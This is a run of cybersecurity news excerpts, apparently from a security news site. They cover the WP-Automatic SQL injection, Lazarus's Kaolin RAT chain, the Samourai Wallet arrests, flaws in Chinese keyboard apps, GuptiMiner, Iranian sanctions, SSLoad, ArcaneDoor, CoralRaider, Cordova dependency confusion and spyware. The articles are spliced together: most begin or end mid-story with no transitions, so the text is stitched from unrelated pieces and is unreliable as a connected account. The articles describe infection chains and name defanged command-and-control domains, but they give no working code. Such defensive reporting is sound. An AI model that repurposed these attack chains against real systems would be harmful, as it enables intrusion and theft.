Level 0 Probe: Unsuccessful exploitation attempt - Update to the latest provided
hotfix Level 1 Test: Evidence of vulnerability being tested on the device,
including the creation of an empty file on the firewall but no execution of
unauthorized commands - Update to the latest provided hotfix Level 2
Potential Exfiltration: Signs where files like "running_config.xml" are copied
to a location that is accessible via web requests - Update to the latest
provided hotfix and perform a Private Data Reset Level 3 Interactive access:
Evidence of interactive command execution, such as the introduction of backdoors
and other malicious code - Update to the latest provided hotfix and perform a
Factory Reset "Performing a private data reset eliminates risks of potential
misuse of device data," Palo Alto Networks said. "A factory reset is recommended
due to evidence of more invasive threat actor activity."
The shortcoming, tracked as CVE-2024-27956, carries a CVSS score of 9.9 out of a
maximum of 10. It impacts all versions of the plugin prior to 3.92.0. The issue
has been resolved in version 3.92.1 released on February 27, 2024, although the
release notes make no mention of it.
"This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as
attackers can exploit it to gain unauthorized access to websites, create
admin‑level user accounts, upload malicious files, and potentially take full
control of affected sites," WPScan said in an alert this week.
According to the Automattic-owned company, the issue is rooted in the plugin's
user authentication mechanism, which can be trivially circumvented to execute
arbitrary SQL queries against the database by means of specially crafted
requests.
In the attacks observed so far, CVE-2024-27956 is being used to unauthorized
database queries and create new admin accounts on susceptible WordPress sites
(e.g., names starting with "xtw"), which could then be leveraged for follow-on
post-exploitation actions.
This includes installing plugins that make it possible to upload files or edit
code, indicating attempts to repurpose the infected sites as stagers.
"Once a WordPress site is compromised, attackers ensure the longevity of their
access by creating backdoors and obfuscating the code," WPScan said. "To evade
detection and maintain access, attackers may also rename the vulnerable
WP‑Automatic file, making it difficult for website owners or security tools to
identify or block the issue."
The file in question is "/wp‑content/plugins/wp‑automatic/inc/csv.php," which is
renamed to something like
"/wp‑content/plugins/wp‑automatic/inc/csv65f82ab408b3.php."
That said, it's possible that the threat actors are doing so in an attempt to
prevent other attackers from exploiting the sites already under their control.
CVE-2024-27956 was publicly disclosed by WordPress security firm Patchstack on
March 13, 2024. Since then, more than 5.5 million attack attempts to weaponize
the flaw have been detected in the wild.
The disclosure comes as severe bugs have been disclosed in plugins like Email
Subscribers by Icegram Express (CVE-2024-2876, CVSS score: 9.8), Forminator
(CVE-2024-28890, CVSS score: 9.8), and User Registration (CVE-2024-2417, CVSS
score: 8.8) that could be used to extract sensitive data like password hashes
from the database, upload arbitrary files, and grant an authenticator user admin
privileges.
Patchstack has also warned of an unpatched issue in the Poll Maker plugin
(CVE-2024-32514, CVSS score: 9.9) that allows for authenticated attackers, with
subscriber-level access and above, to upload arbitrary files on the affected
site's server, leading to remote code execution.
The malware could, "aside from standard RAT functionality, change the last write
timestamp of a selected file and load any received DLL binary from
[command-and-control] server," Avast security researcher Luigino Camastra said
in a report published last week.
The RAT acts as a pathway to deliver the FudModule rootkit, which has been
recently observed leveraging a now-patched admin-to-kernel exploit in the
appid.sys driver (CVE-2024-21338, CVSS score: 7.8) to obtain a kernel read/write
primitive and ultimately disable security mechanisms.
The Lazarus Group's use of job offer lures to infiltrate targets is not new.
Dubbed Operation Dream Job, the long-running campaign has a track record of
using various social media and instant messaging platforms to deliver malware.
These initial access vectors trick targets into launching a malicious optical
disc image (ISO) file bearing three files, one of which masquerades as an Amazon
VNC client ("AmazonVNC.exe") that, in reality, is a renamed version of a
legitimate Windows application called "choice.exe."
The two other files, named "version.dll" and "aws.cfg," act as a catalyst to
kick-start the infection chain. Specifically, the executable "AmazonVNC.exe" is
used to side-load "version.dll," which, in turn, spawns an IExpress.exe process
and injects into it a payload residing within "aws.cfg."
The payload is designed to download shellcode from a command-and-control (C2)
domain ("henraux[.]com"), which is suspected to be an actual-but-hacked website
belonging to an Italian company that specializes in excavating and processing
marble and granite.
While the exact nature of the shellcode is unclear, it's said to be used to
launch RollFling, a DLL-based loader that serves to retrieve and launch the
next-stage malware named RollSling, which was disclosed by Microsoft last year
in connection with a Lazarus Group campaign exploiting a critical JetBrains
TeamCity flaw (CVE-2023-42793, CVSS score: 9.8).
RollSling, executed directly in memory in a likely attempt to evade detection by
security software, represents the next phase of the infection procedure. Its
primary function is to trigger the execution of a third loader dubbed RollMid
that's also run in the system's memory.
RollMid comes fitted with capabilities to set the stage for the attack and
establish contact with a C2 server, which involves a three-step process of its
own as follows -
Communicate with the first C2 server to fetch a HTML file containing the address
of the second C2 server Communicate with the second C2 server to fetch a PNG
image that embeds a malicious component using a technique called steganography
Transmit data to the third C2 server using the address specified in the
concealed data within the image Retrieve an additional Base64-encoded data
blob from the third C2 server, which is the Kaolin RAT The technical
sophistication behind the multi-stage sequence, while no doubt complex and
intricate, borders on overkill, Avast opined, with the Kaolin RAT paving the way
for the deployment of the FudModule rootkit after setting up communications with
the RAT's C2 server.
On top of that, the malware is equipped to enumerate files; carry out file
operations; upload files to the C2 server; alter a file's last modified
timestamp; enumerate, create, and terminate processes; execute commands using
cmd.exe; download DLL files from the C2 server; and connect to an arbitrary
host.
"The Lazarus group targeted individuals through fabricated job offers and
employed a sophisticated toolset to achieve better persistence while bypassing
security products," Camastra said.
"It is evident that they invested significant resources in developing such a
complex attack chain. What is certain is that Lazarus had to innovate
continuously and allocate enormous resources to research various aspects of
Windows mitigations and security products. Their ability to adapt and evolve
poses a significant challenge to cybersecurity efforts."
To that end, Keonne Rodriguez, 35, and William Lonergan Hill, 65, have been
charged with conspiracy to commit money laundering and conspiracy to operate an
unlicensed money transmitting business from 2015 through February 2024.
Rodriguez and Hill face a maximum sentence of 25 years in prison each.
Rodriguez, the CEO of the company, and CTO Hill intentionally designed Samourai
to help "criminals to engage in large-scale money laundering and sanctions
evasion," while ostensibly marketing as a privacy-oriented service, the DoJ
said.
Samourai laundered money from illegal dark web marketplaces, including Silk Road
and Hydra, as well as spear-phishing schemes and scams aimed at defrauding
multiple decentralized finance protocols.
The operation, which also involved law enforcement agencies from Iceland and
Portugal, along with Europol, saw its digital infrastructure confiscated and its
Android app pulled from the Google Play Store in the U.S. Hill, who was
apprehended in Portugal, is awaiting his extradition to the U.S. Rodriguez was
taken into custody in Pennsylvania.
Samourai offered a cryptocurrency mixing service known as Whirlpool to help
users conceal the cryptocurrency transaction trail, in addition to incorporating
an "exclusive transaction type" called Ricochet Send that made it possible to
add intermediate hops when sending cryptocurrency from one address to another.
Whirlpool was advertised as a way to "mathematically disassociate the ownership
of inputs to outputs in a given bitcoin transaction," which they claimed
increases the privacy of the users involved, protects against financial
surveillance, and improves the fungibility of the Bitcoin network.
"Ricochet defends against bitcoin blacklists by adding additional decoy
transactions between the initial send and eventual recipient," according to the
official documentation. "You should consider using Ricochet when sending to
Bitcoin Exchanges, and companies that are known to close accounts for flimsy
reasons."
The feature is engineered to prevent law enforcement and/or cryptocurrency
exchanges from recognizing that a particular batch of cryptocurrency originated
from criminal activity, the DoJ alleged.
Besides openly courting users (e.g., Russian oligarchs) to circumvent sanctions
and launder criminal proceeds through Samourai on their X (formerly Twitter)
account, the defendants have also been found transmitting to investors marketing
materials that described how its user base was intended to include online
gamblers and criminals who need the anonymity to conduct their illegal
activities.
"Rodriguez and Hill acknowledge that its revenues will be derived from
'Dark/Grey Market participants' seeking to 'swap their bitcoins with multiple
parties' to avoid detection," the DoJ said.
The arrests come weeks after a former security engineer named Shakeeb Ahmed was
sentenced to three years in prison in the U.S. for charges relating to hacking
two decentralized cryptocurrency exchanges in July 2022 and stealing over $12.3
million, which were then laundered using Samourai Whirlpool.
The tech giant said it's working closely with the U.K. Competition and Markets
Authority (CMA) and hopes to achieve an agreement by the end of the year.
As part of the new timeline, it aims to start phasing out third-party cookies
early next year, making it the third such extension since the tech giant
announced the plans in 2020, postponing it from early 2022 to late 2023, and
again to the second half of 2024.
Privacy Sandbox refers to a set of initiatives that offers privacy-preserving
alternatives to tracking cookies and cross-app identifiers in order to serve
tailored ads to users.
While Google has since enabled the features to a subset of Chrome browser users
as of last year, the U.K. watchdog, alongside the Information Commissioner's
Office (ICO), has been keeping a close eye on the implementation to ensure that
Privacy Sandbox benefits consumers and doesn't favor Google's own advertising
tech.
Both Apple and Mozilla have discontinued support for third-party cookies in
their respective web browsers as of early 2020.
"We recognize that there are ongoing challenges related to reconciling divergent
feedback from the industry, regulators and developers, and will continue to
engage closely with the entire ecosystem," Google said in an update.
"It's also critical that the CMA has sufficient time to review all evidence
including results from industry tests, which the CMA has asked market
participants to provide by the end of June."
In a setback for Google, a draft report from the ICO revealed that the company's
proposed replacements have gaps that advertisers could exploit to identify
users, effectively undermining the privacy and anonymity objectives, according
to the Wall Street Journal last week.
The development comes as Google said it's updating client-side encrypted (CSE)
Google Meet calls to include support for inviting external participants,
including those without a Google account.
The findings come from the Citizen Lab, which discovered weaknesses in eight of
nine apps from vendors like Baidu, Honor, iFlytek, OPPO, Samsung, Tencent, Vivo,
and Xiaomi. The only vendor whose keyboard app did not have any security
shortcomings is that of Huawei's.
The vulnerabilities could be exploited to "completely reveal the contents of
users' keystrokes in transit," researchers Jeffrey Knockel, Mona Wang, and Zoë
Reichert said.
The disclosure builds upon prior research from the interdisciplinary laboratory
based at the University of Toronto, which identified cryptographic flaws in
Tencent's Sogou Input Method last August.
Collectively, it's estimated that close to one billion users are affected by
this class of vulnerabilities, with Input Method Editors (IMEs) from Sogou,
Baidu, and iFlytek accounting for a huge chunk of the market share.
A summary of the identified issues is as follows -
Tencent QQ Pinyin, which is vulnerable to a CBC padding oracle attack that could
make it possible to recover plaintext Baidu IME, which allows network
eavesdroppers to decrypt network transmissions and extract the typed text on
Windows owing to a bug in the BAIDUv3.1 encryption protocol iFlytek IME,
whose Android app allows network eavesdroppers to recover the plaintext of
insufficiently encrypted network transmissions Samsung Keyboard on Android,
which transmits keystroke data via plain, unencrypted HTTP Xiaomi, which
comes preinstalled with keyboard apps from Baidu, iFlytek, and Sogou (and
therefore susceptible to the same aforementioned flaws) OPPO, which comes
preinstalled with keyboard apps from Baidu and Sogou (and therefore susceptible
to the same aforementioned flaws) Vivo, which comes preinstalled with Sogou
IME (and therefore susceptible to the same aforementioned flaw) Honor, which
comes preinstalled with Baidu IME (and therefore susceptible to the same
aforementioned flaw) Successful exploitation of these vulnerabilities could
permit adversaries to decrypt Chinese mobile users' keystrokes entirely
passively without sending any additional network traffic. Following responsible
disclosure, every keyboard app developer with the exception of Honor and Tencent
(QQ Pinyin) have addressed the issues as of April 1, 2024.
Users are advised to keep their apps and operating systems up-to-date and switch
to a keyboard app that entirely operates on-device to mitigate these privacy
issues.
Other recommendations call on app developers to use well-tested and standard
encryption protocols instead of developing homegrown versions that could have
security problems. App store operators have also been urged not to geoblock
security updates and allow developers to attest to all data being transmitted
with encryption.
The Citizen Lab theorized it's possible that Chinese app developers are less
inclined to use "Western" cryptographic standards owing to concerns that they
may contain backdoors of their own, prompting them to develop in-house ciphers.
"Given the scope of these vulnerabilities, the sensitivity of what users type on
their devices, the ease with which these vulnerabilities may have been
discovered, and that the Five Eyes have previously exploited similar
vulnerabilities in Chinese apps for surveillance, it is possible that such
users' keystrokes may have also been under mass surveillance," the researchers
said.
Cybersecurity firm Avast said the activity is the work of a threat actor with
possible connections to a North Korean hacking group dubbed Kimsuky, which is
also known as Black Banshee, Emerald Sleet, and TA427.
"GuptiMiner is a highly sophisticated threat that uses an interesting infection
chain along with a couple of techniques that include performing DNS requests to
the attacker's DNS servers, performing sideloading, extracting payloads from
innocent-looking images, signing its payloads with a custom trusted root anchor
certification authority, among others," Avast said.
The intricate and elaborate infection chain, at its core, leverages a security
shortcoming in the update mechanism of Indian antivirus vendor eScan to
propagate the malware by means of an adversary-in-the-middle (AitM) attack.
Specifically, it entails hijacking the updates by substituting the package file
with a malicious version by taking advantage of the fact that the downloads were
not signed and secured using HTTPS. The issue, which went unnoticed for at least
five years, has been rectified as of July 31, 2023.
The rogue DLL ("updll62.dlz") executed by the eScan software side-loads a DLL
("version.dll") to activate a multi-stage sequence starting with a PNG file
loader that, in turn, employs malicious DNS servers to contact a
command-and-control (C2) server and fetch a PNG file with appended shellcode.
"GuptiMiner hosts their own DNS servers for serving true destination domain
addresses of C&C servers via DNS TXT responses," researchers Jan Rubín and
Milánek said.
"As the malware connects to the malicious DNS servers directly, the DNS protocol
is completely separated from the DNS network. Thus, no legitimate DNS server
will ever see the traffic from this malware."
The PNG file is then parsed to extract the shellcode, which is then responsible
for executing a Gzip loader that's designed to decompress another shellcode
using Gzip and execute it in a separate thread.
The third-stage malware, dubbed Puppeteer, pulls all the strings, ultimately
deploying the XMRig cryptocurrency miner and backdoors on the infected systems.
Avast said it encountered two different types of backdoors that come fitted with
features to enable lateral movement, accept commands from the threat actor, and
deliver additional components as required.
"The first is an enhanced build of PuTTY Link, providing SMB scanning of the
local network and enabling lateral movement over the network to potentially
vulnerable Windows 7 and Windows Server 2008 systems on the network," the
researchers explained.
"The second backdoor is multi-modular, accepting commands from the attacker to
install more modules as well as focusing on scanning for stored private keys and
crypto wallets on the local system."
The deployment of XMRig has been described as "unexpected" for what's otherwise
a complex and meticulously executed operation, raising the possibility that the
miner acts as a distraction to prevent victims from discovering the true extent
of the compromise.
GuptiMiner, known to be active since at least 2018, also makes use of various
techniques like anti-VM and anti-debug tricks, code virtualization, dropping the
PNG loader during system shutdown events, storing payloads in Windows Registry,
and adding a root certificate to Windows' certificate store to make the PNG
loader DLLs appear trustworthy.
The links to Kimusky come from an information stealer that, while not
distributed by GuptiMiner or via the infection flow, has been used "across the
whole GuptiMiner campaign" and shares overlaps with a keylogger previously
identified as utilized by the group.
It's currently not clear who the targets of the campaign are, but GuptiMiner
artifacts have been uploaded to VirusTotal from India and Germany as early as
April 2018, with Avast telemetry data highlighting new infections likely
originating from out-of-date eScan clients.
The findings come as the Korean National Police Agency (KNPA) called out North
Korean hacking crews such as Lazarus, Andariel, and Kimsuky for targeting the
defense sector in the country and exfiltrating valuable data from some of them.
A report from the Korea Economic Daily said the threat actors penetrated the
networks of 83 South Korean defense contractors and stole confidential
information from about 10 of them from October 2022 to July 2023.
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Monday
sanctioned two firms and four individuals for their involvement in malicious
cyber activities on behalf of the Iranian Islamic Revolutionary Guard Corps
Cyber Electronic Command (IRGC-CEC) from at least 2016 to April 2021.
This includes the front companies Mehrsam Andisheh Saz Nik (MASN) and Dadeh
Afzar Arman (DAA), as well as the Iranian nationals Alireza Shafie Nasab, Reza
Kazemifar Rahman, Hossein Mohammad Harooni, and Komeil Baradaran Salmani.
"These actors targeted more than a dozen U.S. companies and government entities
through cyber operations, including spear-phishing and malware attacks," the
Treasury Department said.
Concurrent with the sanctions, the U.S. Department of Justice (DoJ) unsealed an
indictment against the four individuals for orchestrating cyber attacks
targeting the U.S. government and private entities.
Furthermore, a reward of up to $10 million has been announced as part of the
U.S. Department of State's Rewards for Justice program for information leading
to the identification or location of the group and the defendants.
It's worth noting that Nasab, who worked for MASN, was charged in a previous
indictment that was unsealed on February 29, 2024. The defendants remain at
large.
Rahman, also employed by MASN, is alleged to have worked on testing malware
intended to target job seekers with a focus on military veterans. He also
purportedly worked for the Iranian Organization for Electronic Warfare and Cyber
Defense (EWCD), a component of IRGC, from about 2014 through 2020.
MASN (formerly Mahak Rayan Afraz and Dehkadeh Telecommunication and Security
Company) is tracked by the cybersecurity community under the name Tortoiseshell
and is one of the many contracting companies that act as a cover for malicious
campaigns orchestrated by IRGC. It was liquidated in June 2023.
The U.S. Treasury Department said the second sanctioned company also "engaged in
malicious cyber campaigns on behalf of the IRGC-CEC," noting that Harooni was
employed by DAA and has carried out spear-phishing and social engineering
attacks against U.S. organizations.
Salmani is said to be associated with multiple IRGC-CEC front companies,
including MASN, and involved in spear-phishing campaigns targeting U.S.
entities. Nasab, Harooni, and Salmani have also been responsible for procuring
and maintaining the online network infrastructure used to facilitate the
intrusions, the DoJ said.
In all, in the coordinated multi-year hacking spree, the defendants primarily
singled out private sector defense contractors and other government entities,
ultimately compromising more than 200,000 employee accounts.
Each of the defendants has been charged with conspiracy to commit computer
fraud, conspiracy to commit wire fraud, and wire fraud. If convicted, they face
up to five years in prison for the computer fraud conspiracy, and up to 20 years
in prison for each count of wire fraud and conspiracy to commit wire fraud.
Furthermore, Harooni has been charged with knowingly damaging a protected
computer, which carries a maximum penalty of 10 years in prison. Nasab, Harooni,
and Salmani have also been charged with aggravated identity theft, which carries
a mandatory consecutive term of two years in prison.
"Criminal activity originating from Iran poses a grave threat to America's
national security and economic stability," said Attorney General Merrick B.
Garland in a statement.
"These defendants are alleged to have engaged in a coordinated, multi-year
hacking campaign from Iran targeting more than a dozen American companies and
the U.S. Treasury and State Departments."
The development comes amid geopolitical tensions in the Middle East after an
Israeli air strike bombed Iran's embassy in Syria, prompting the latter to
launch a drone-and-missile attack on Israel, which, in turn, led to an Israeli
missile strike hitting an air defense radar system near Isfahan.
The campaign, codenamed FROZEN#SHADOW by Securonix, also involves the deployment
of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software.
"SSLoad is designed to stealthily infiltrate systems, gather sensitive
information and transmit its findings back to its operators," security
researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared
with The Hacker News.
"Once inside the system, SSLoad deploys multiple backdoors and payloads to
maintain persistence and avoid detection."
Attack chains involve the use of phishing messages to randomly target
organizations in Asia, Europe, and the Americas, with emails containing links
that lead to the retrieval of a JavaScript file that kicks off the infection
flow.
Earlier this month, Palo Alto Networks uncovered at least two different methods
by which SSLoad is distributed, one which entails the use of website contact
forms to embed booby-trapped URLs and another involving macro-enabled Microsoft
Word documents.
The latter is also notable for the fact that malware acts as a conduit for
delivering Cobalt Strike, while the former has been used to deliver a different
malware called Latrodectus, a likely successor to IcedID.
The obfuscated JavaScript file ("out_czlrh.js"), when launched and run using
wscript.exe, retrieves an MSI installer file ("slack.msi") by connecting to a
network share located at "\\wireoneinternet[.]info@80\share\" and runs it using
msiexec.exe.
The MSI installer, for its part, contacts an attacker-controlled domain to fetch
and execute the SSLoad malware payload using rundll32.exe, following which it
beacons to a command-and-control (C2) server along with information about the
compromised system.
The initial reconnaissance phase paves the way for Cobalt Strike, a legitimate
adversary simulation software, which is then used to download and install
ScreenConnect, thereby allowing the threat actors to remotely commandeer the
host.
"With full access to the system the threat actors began attempting to acquire
credentials and gather other critical system details," the researchers said. "At
this stage they started scanning the victim host for credentials stored in files
as well as other potentially sensitive documents."
The attackers have also been observed pivoting to other systems in the network,
including the domain controller, ultimately infiltrating the victim's Windows
domain by creating their own domain administrator account.
"With this level of access, they could get into any connected machine within the
domain," the researchers said. "In the end, this is the worst case scenario for
any organization as this level of persistence achieved by the attackers would be
incredibly time consuming and costly to remediate."
The disclosure comes as the AhnLab Security Intelligence Center (ASEC) revealed
that Linux systems are being infected with an open-source remote access trojan
called Pupy RAT.
Cisco Talos, which dubbed the activity ArcaneDoor, attributing it as the
handiwork of a previously undocumented sophisticated state-sponsored actor it
tracks under the name UAT4356 (aka Storm-1849 by Microsoft).
"UAT4356 deployed two backdoors as components of this campaign, 'Line Runner'
and 'Line Dancer,' which were used collectively to conduct malicious actions
on-target, which included configuration modification, reconnaissance, network
traffic capture/exfiltration and potentially lateral movement," Talos said.
The intrusions, which were first detected and confirmed in early January 2024,
entail the exploitation of two vulnerabilities -
CVE-2024-20353 (CVSS score: 8.6) - Cisco Adaptive Security Appliance and
Firepower Threat Defense Software Web Services Denial-of-Service Vulnerability
CVE-2024-20359 (CVSS score: 6.0) - Cisco Adaptive Security Appliance and
Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
It's worth noting that a zero-day exploit is the technique or attack a malicious
actor deploys to leverage an unknown security vulnerability to gain access into
a system.
While the second flaw allows a local attacker to execute arbitrary code with
root-level privileges, administrator-level privileges are required to exploit
it. Addressed alongside CVE-2024-20353 and CVE-2024-20359 is a command injection
flaw in the same appliance (CVE-2024-20358, CVSS score: 6.0) that was uncovered
during internal security testing.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the
shortcomings to its Known Exploited Vulnerabilities (KEV) catalog, requiring
federal agencies to apply the vendor-provided fixes by May 1, 2024.
The exact initial access pathway used to breach the devices is presently
unknown, although UAT4356 is said to have started preparations for it as early
as July 2023.
A successful foothold is followed by the deployment of two implants named Line
Dancer and Line Runner, the former of which is an in-memory backdoor that
enables attackers to upload and execute arbitrary shellcode payloads, including
disabling system logs and exfiltrating packet captures.
Line Runner, on the other hand, is a persistent HTTP-based Lua implant installed
on the Cisco Adaptive Security Appliance (ASA) by leveraging the aforementioned
zero-days such that it can survive across reboots and upgrades. It has been
observed being used to fetch information staged by Line Dancer.
"It is suspected that Line Runner may be present on a compromised device even if
Line Dancer is not (e.g., as a persistent backdoor, or where an impacted ASA has
not yet received full operational attention from the malicious actors),"
according to a joint advisory published by cybersecurity agencies from
Australia, Canada, and the U.K.
At every phase of the attack, UAT4356 is said to have demonstrated meticulous
attention to hiding digital footprints and the ability to employ intricate
methods to evade memory forensics and lower the chances of detection,
contributing to its sophistication and elusive nature.
This also suggests that the threat actors have a complete understanding of the
inner workings of the ASA itself and of the "forensic actions commonly performed
by Cisco for network device integrity validation."
Exactly which country is behind ArcaneDoor is unclear, however both Chinese and
Russian state-backed hackers have targeted Cisco routers for cyber espionage
purposes in the past. Cisco Talos also did not specify how many customers were
compromised in these attacks.
The development once again highlights the increased targeting of edge devices
and platforms such as email servers, firewalls, and VPNs that traditionally lack
endpoint detection and response (EDR) solutions, as evidenced by the recent
string of attacks targeting Barracuda Networks, Fortinet, Ivanti, Palo Alto
Networks, and VMware.
"Perimeter network devices are the perfect intrusion point for espionage-focused
campaigns," Talos said.
"As a critical path for data into and out of the network, these devices need to
be routinely and promptly patched; using up-to-date hardware and software
versions and configurations; and be closely monitored from a security
perspective. Gaining a foothold on these devices allows an actor to directly
pivot into an organization, reroute or modify traffic and monitor network
communications."
A new ongoing malware campaign has been observed distributing three different
stealers, such as CryptBot, LummaC2, and Rhadamanthys hosted on Content Delivery
Network (CDN) cache domains since at least February 2024.
Cisco Talos has attributed the activity with moderate confidence to a threat
actor tracked as CoralRaider, a suspected Vietnamese-origin group that came to
light earlier this month.
This assessment is based on "several overlaps in tactics, techniques, and
procedures (TTPs) of CoralRaider's Rotbot campaign, including the initial attack
vector of the Windows Shortcut file, intermediate PowerShell decryptor and
payload download scripts, the FoDHelper technique used to bypass User Access
Controls (UAC) of the victim machine," the company said.
Targets of the campaign span various business verticals across geographies,
including the U.S., Nigeria, Pakistan, Ecuador, Germany, Egypt, the U.K.,
Poland, the Philippines, Norway, Japan, Syria, and Turkey.
Attack chains involve users downloading files masquerading as movie files via a
web browser, raising the possibility of a large-scale attack.
"This threat actor is using a Content Delivery Network (CDN) cache to store the
malicious files on their network edge host in this campaign, avoiding request
delay," Talos researchers Joey Chen, Chetan Raghuprasad, and Alex Karkins said.
"The actor is using the CDN cache as a download server to deceive network
defenders."
The initial access vector for the drive-by downloads is suspected to be phishing
emails, using them as a conduit to propagate booby-trapped links pointing to ZIP
archives containing a Windows shortcut (LNK) file.
The shortcut file, in turn, runs a PowerShell script to fetch a next-stage HTML
application (HTA) payload hosted on the CDN cache, which subsequently runs
Javascript code to launch an embedded PowerShell loader that takes steps to fly
under the radar and ultimately downloads and runs one of the three stealer
malware.
The modular PowerShell loader script is designed to bypass the User Access
Controls (UAC) in the victim's machine using a known technique called FodHelper,
which has also been put to use by Vietnamese threat actors linked to another
stealer known as NodeStealer that's capable of stealing Facebook account data.
The stealer malware, regardless of what's deployed, grabs victims' information,
such as system and browser data, credentials, cryptocurrency wallets, and
financial information.
What's notable about the campaign is that it utilizes an updated version of
CryptBot that packs in new anti-analysis techniques and also captures password
manager application databases and authenticator application information.
Dependency confusion attacks take place owing to the fact that package managers
check the public repositories before private registries, thus allowing a threat
actor to publish a malicious package with the same name to a public package
repository.
This causes the package manager to inadvertently download the fraudulent package
from the public repository instead of the intended private repository. If
successful, it can have serious consequences, such as installing all downstream
customers that install the package.
A May 2023 analysis of npm and PyPI packages stored in cloud environments by
enterprise security company Orca revealed that nearly 49% of organizations are
vulnerable to a dependency confusion attack.
While npm and other package managers have since introduced fixes to prioritize
the private versions, application security firm Legit Security said it found the
Cordova App Harness project to reference an internal dependency named
cordova-harness-client without a relative file path.
The open-source initiative was discontinued by the Apache Software Foundation
(ASF) as of April 18, 2019.
As Legit Security demonstrated, this left the door wide open for a supply chain
attack by uploading a malicious version under the same name with a higher
version number, thus causing npm to retrieve the bogus version from the public
registry.
With the bogus package attracting over 100 downloads after being uploaded to
npm, it indicates that the archived project is still being put to use, likely
posing severe risks to users.
In a hypothetical attack scenario, an attacker could hijack the library to serve
malicious code that could be executed on the target host upon package
installation.
The Apache security team has since addressed the problem by taking ownership of
the cordova-harness-client package. It's worth noting that organizations are
advised to create public packages as placeholders to prevent dependency
confusion attacks.
"This discovery highlights the need to consider third-party projects and
dependencies as potential weak links in the software development factory,
especially archived open-source projects that may not receive regular updates or
security patches," security researcher Ofek Haviv said.
"Although it may seem tempting to leave them as is, these projects tend to have
vulnerabilities that are not getting attention and not likely to be fixed."
They called on the industry and governments to take urgent action to ensure
public safety across social media platforms.
"Privacy measures currently being rolled out, such as end-to-end encryption,
will stop tech companies from seeing any offending that occurs on their
platforms," Europol said.
"It will also stop law enforcement's ability to obtain and use this evidence in
investigations to prevent and prosecute the most serious crimes such as child
sexual abuse, human trafficking, drug smuggling, homicides, economic crime, and
terrorism offenses."
The idea that E2EE protections could stymie law enforcement is often referred to
as the "going dark" problem, triggering concerns it could create new obstacles
to gather evidence of nefarious activity.
The development comes against the backdrop of Meta rolling out E2EE in Messenger
by default for personal calls and one-to-one personal messages as of December
2023.
The U.K. National Crime Agency (NCA) has since criticized the company's design
choices, which made it harder to protect children from sexual abuse online and
undermined their ability to investigate crime and keep the public safe from
serious threats.
"Encryption can be hugely beneficial, protecting users from a range of crimes,"
NCA Director General Graeme Biggar said. "But the blunt and increasingly
widespread rollout by major tech companies of end-to-end encryption, without
sufficient consideration for public safety, is putting users in danger."
Europol's Executive Director Catherine de Bolle noted that tech companies have a
social responsibility to develop a safe environment without hampering law
enforcement's ability to collect evidence.
The joint declaration also urges the tech industry to build products keeping
cybersecurity in mind, but at the same time provide a mechanism for identifying
and flagging harmful and illegal content.
"We do not accept that there need be a binary choice between cybersecurity or
privacy on the one hand and public safety on the other," the agencies said.
"Our view is that technical solutions do exist; they simply require flexibility
from industry as well as from governments. We recognise that the solutions will
be different for each capability, and also differ between platforms."
Meta, for what it's worth, already relies on a variety of signals gleaned from
unencrypted information and user reports to combat child sexual exploitation on
WhatsApp.
Earlier this month, the social media giant also said it's piloting a new set of
features in Instagram to protect young people from sextortion and intimate image
abuse using client-side scanning.
"Nudity protection uses on-device machine learning to analyze whether an image
sent in a DM on Instagram contains nudity," Meta said.
"Because the images are analyzed on the device itself, nudity protection will
work in end-to-end encrypted chats, where Meta won't have access to these images
– unless someone chooses to report them to us."
The full names of the defendants were not disclosed by the Office of the Federal
Prosecutor (aka Generalbundesanwalt), but it includes Herwig F., Ina F., and
Thomas R.
"The suspects are strongly suspected of working for a Chinese secret service
since an unspecified date before June 2022," the Generalbundesanwalt said.
Thomas R. is believed to have acted as an agent for China's Ministry of State
Security (MSS), gathering information about innovative technologies in Germany
that could be used for military purposes.
The defendant also sought the help of a married couple, Herwig F. and Ina F.,
who run a Düsseldorf-based business that established connections with the
scientific and research community in Germany.
This materialized in the form of an agreement with an unnamed German university
to conduct a study for an unnamed Chinese contractor regarding the operation of
high-performance marine engines for use on combat ships.
"At the time of their arrest, the defendants were in further negotiations on
research projects that could be useful for expanding China's maritime combat
power," the agency said.
"In addition, the defendants purchased a special laser from Germany on behalf of
and with payment from the MSS and exported it to China without permission, even
though the instrument is subject to the E.U. dual-use regulation."
The development comes as the Generalbundesanwalt announced the arrest of another
citizen named Jian G. for acting as an agent for the Chinese Secret Service
while working for a German Member of the European Parliament since 2019.
"In January 2024, the accused repeatedly passed on information about
negotiations and decisions in the European Parliament to his intelligence
client," it said. "In addition, he spied on Chinese opposition members in
Germany for the intelligence service."
Last week, the Office of the Federal Prosecutor also executed an arrest warrant
against a German-Russian citizen Alexander J. for purported secret service agent
activity.
The arrests also follow the charging of Christopher Berry, 32, and Christopher
Cash, 29, in the U.K. for passing on sensitive information to China in violation
of the Official Secrets Act, according to the Metropolitan Police and the Crown
Prosecution Service (CPS).
The two individuals, previously arrested on March 13, 2023, from Oxfordshire and
Edinburgh, respectively, and later released on bail, have been accused of
sharing "articles, notes, documents, or information" which may have been
directly or indirectly useful to an enemy nation.
A spokesperson for the Chinese Embassy told BBC News that the allegations amount
to "malicious slander" and urged the U.K. to "stop anti-China political
manipulation."
"These individuals have facilitated or derived financial benefit from the misuse
of this technology, which has targeted journalists, academics, human rights
defenders, dissidents and other perceived critics, and U.S. Government
personnel," the department said.
The names of those subjected to visa restrictions were not disclosed, but the
move comes more than two months after the U.S. government said it's enacting a
new policy that enforces visa constraints on people engaging in practices that
could threaten privacy and freedom of expression.
It also aims to counter the misuse and proliferation of commercial spyware that
has been put to use by authoritarian governments to spy on civil society
members, in addition to promoting accountability.
The development comes as Israeli publication Haaretz reported that Intellexa
presented a proof-of-concept (PoC) system in 2022 called Aladdin that enabled
the planting of phone spyware through online ads.
The Intellexa Consortium was sanctioned by the U.S. Department of Treasury's
Office of Foreign Assets Control (OFAC) last month for developing, operating,
and distributing" commercial spyware designed to target government officials,
journalists, and policy experts in the country.
It's not just spyware, as Kaspersky recently reported that 31,031 unique users
were affected by stalkerware in 2023, up from 29,312 a year prior, with most of
them located in Russia, Brazil, and India – a dubious distinction held by the
three countries since 2019.
"Stalkerware products are typically marketed as legitimate anti-theft or
parental control apps for smartphones, tablets and computers, but in reality,
they are something very different. Installed without the knowledge or consent of
